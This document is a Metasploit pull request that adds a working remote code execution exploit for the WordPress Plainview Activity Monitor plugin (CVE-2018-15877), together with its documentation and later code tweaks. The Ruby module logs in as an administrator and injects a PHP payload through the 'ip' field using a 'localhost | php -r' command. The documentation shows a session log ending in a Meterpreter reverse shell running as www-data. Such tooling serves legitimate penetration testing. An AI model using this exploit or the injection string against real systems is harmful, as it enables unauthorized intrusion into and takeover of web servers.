### PR TITLE
Add Wordpress Plainview Activity Monitor RCE

### DIFF
--- a/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md
+++ b/documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md
@@ -1,0 +1,75 @@
+## Description
+
+  This module uses administrative functionality available in WordPress
+  when the Plainview Activity Monitor plugin is installed to
+  gain a shell with web server user permissions.
+
+## Vulnerable Software
+
+  This module has been tested successfully on WordPress 4.6
+  with Plainview Activity Monitor version 20161228 installed.
+
+  Software:
+
+  * https://wordpress.org/plugins/plainview-activity-monitor/
+  * https://wordpress.org/download/releases/
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/wp_plainview_activity_monitor_rce`
+  3. Do: `set rhosts <IP or domain_name>`
+  4. Do: `set username <username>`
+  5. Do: `set password <password>`
+  6. Do: `set vhost <domain_name>`
+  7. Do: `run`
+  8. You should get a new session
+
+## Options
+
+  **TARGETURI**
+
+  The base path to WordPress (default: `/`)
+
+  **USERNAME**
+
+  The username for WordPress
+
+  **PASSWORD**
+
+  The password for WordPress
+
+
+## Scenarios
+
+ ```
+  msf5 > use exploit/unix/webapp/wp_plainview_activity_monitor_rce 
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set rhosts wordpress.test.local
+  rhosts => wordpress.test.local
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set username admin
+  username => admin
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set password 123456
+  password => 123456
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set vhost wordpress.test.local
+  vhost => wordpress.test.local
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > show targets
+
+  Exploit targets:
+
+     Id  Name
+     --  ----
+     0   WordPress
+
+
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > exploit
+
+  [*] Started reverse TCP handler on 10.0.0.2:4444 
+  [*] Trying to login...
+  [+] Login Successful
+  [*] Sending stage (38288 bytes) to 10.0.0.3
+  [*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.3:51990) at 2019-11-10 08:24:11 +0100
+
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > 
+ ```

--- a/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
+++ b/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
@@ -7,7 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::Remote::HttpClient
 
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   def initialize(info = {})
     super(update_info(info,

--- a/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
+++ b/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
           OptString.new('USERNAME', [ true,  "The user to authenticate as"]),
           OptString.new('PASSWORD', [ true,  "The password to authenticate with" ])
         ])
-    
+
       register_advanced_options(
         [
           OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     check_plugin_version_from_readme('plainview-activity-monitor', '20180826')
   end
-  
+
   def exploit
     unless check == CheckCode::Detected
       unless datastore['ForceExploit']
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
       print_warning 'Target does not appear to be vulnerable'
     end
-    
+
     user = datastore['USERNAME']
     password = datastore['PASSWORD']
 

--- a/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
+++ b/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
@@ -17,10 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
           command injection which allows an attacker to remotely execute
           commands on underlying system. Application passes unsafe user supplied
           data to ip parameter into activities_overview.php.
-          Privileges are required in order to exploit this vulnerability, but
-          this plugin version is also vulnerable to CSRF attack and Reflected
-          XSS. Combined, these three vulnerabilities can lead to Remote Command
-          Execution just with an admin click on a malicious link.
+          Privileges are required in order to exploit this vulnerability.
       },
       'Author'	=>
         [
@@ -49,23 +46,39 @@ class MetasploitModule < Msf::Exploit::Remote
           OptString.new('USERNAME', [ true,  "The user to authenticate as"]),
           OptString.new('PASSWORD', [ true,  "The password to authenticate with" ])
         ])
+    
+      register_advanced_options(
+        [
+          OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+        ])
   end
 
-  def exploit
+  def check
     unless wordpress_and_online?
-      fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
+      vprint_error("#{target_uri} does not seeem to be Wordpress site")
+      return CheckCode::Unknown
     end
-
-    @user = datastore['USERNAME']
-    @password = datastore['PASSWORD']
+    check_plugin_version_from_readme('plainview-activity-monitor', '20180826')
+  end
+  
+  def exploit
+    unless check == CheckCode::Detected
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+    
+    user = datastore['USERNAME']
+    password = datastore['PASSWORD']
 
     print_status("Trying to login...")
-    @cookie = wordpress_login(@user, @password)
-    if @cookie.nil?
+    cookie = wordpress_login(user, password)
+    if cookie.nil?
       fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
     end
     print_good("Login Successful")
-    store_valid_credential(user: @user, private: @password, proof: @cookie)
+    store_valid_credential(user: user, private: password, proof: cookie)
 
     uri = normalize_uri(target_uri.path, 'wp-admin/admin.php')
 
@@ -82,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method'    => 'POST',
-      'cookie'    => @cookie,
+      'cookie'    => cookie,
       'uri'       => uri,
       'vars_get'  => vars_get,
       'vars_post' => vars_post

--- a/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
+++ b/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = NormalRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Plainview Activity Monitor RCE',
+      'Description'    => %q{
+          Plainview Activity Monitor Wordpress plugin is vulnerable to OS
+          command injection which allows an attacker to remotely execute
+          commands on underlying system. Application passes unsafe user supplied
+          data to ip parameter into activities_overview.php.
+          Privileges are required in order to exploit this vulnerability, but
+          this plugin version is also vulnerable to CSRF attack and Reflected
+          XSS. Combined, these three vulnerabilities can lead to Remote Command
+          Execution just with an admin click on a malicious link.
+      },
+      'Author'	=>
+        [
+          'LydA(c)ric LEFEBVRE', # Vulnerability discovery
+          'Leo LE BOUTER', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-15877' ],
+          [ 'EDB', '45274' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Payload'        =>
+        {
+          'BadChars' => '&>\'',
+        },
+      'Targets'        => [['WordPress', {}]],
+      'DisclosureDate' => 'Aug 26 2018'
+      ))
+
+      register_options(
+        [
+          OptString.new('USERNAME', [ true,  "The user to authenticate as"]),
+          OptString.new('PASSWORD', [ true,  "The password to authenticate with" ])
+        ])
+  end
+
+  def exploit
+    unless wordpress_and_online?
+      fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
+    end
+
+    @user = datastore['USERNAME']
+    @password = datastore['PASSWORD']
+
+    print_status("Trying to login...")
+    @cookie = wordpress_login(@user, @password)
+    if @cookie.nil?
+      fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
+    end
+    print_good("Login Successful")
+    store_valid_credential(user: @user, private: @password, proof: @cookie)
+
+    uri = normalize_uri(target_uri.path, 'wp-admin/admin.php')
+
+    vars_get = {
+      'page' => 'plainview_activity_monitor',
+      'tab'  => 'activity_tools'
+    }
+
+    vars_post = {
+      'ip'     => "localhost | php -r '#{payload.encoded}'",
+      'lookup' => 'Lookup',
+      'submit' => 'Submit request'
+    }
+
+    send_request_cgi(
+      'method'    => 'POST',
+      'cookie'    => @cookie,
+      'uri'       => uri,
+      'vars_get'  => vars_get,
+      'vars_post' => vars_post
+    )
+  end
+end

--- a/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
+++ b/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
@@ -18,6 +18,9 @@ class MetasploitModule < Msf::Exploit::Remote
           commands on underlying system. Application passes unsafe user supplied
           data to ip parameter into activities_overview.php.
           Privileges are required in order to exploit this vulnerability.
+
+          Vulnerable plugin version: 20161228 and possibly prior
+          Fixed plugin version: 20180826
       },
       'Author'	=>
         [

--- a/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
+++ b/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb
@@ -62,7 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless check == CheckCode::Detected
+    check_code = check
+    unless check_code == CheckCode::Detected || check_code == CheckCode::Appears
       unless datastore['ForceExploit']
         fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
       end


### PR DESCRIPTION
Description:

```
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
```

From: https://www.exploit-db.com/exploits/45274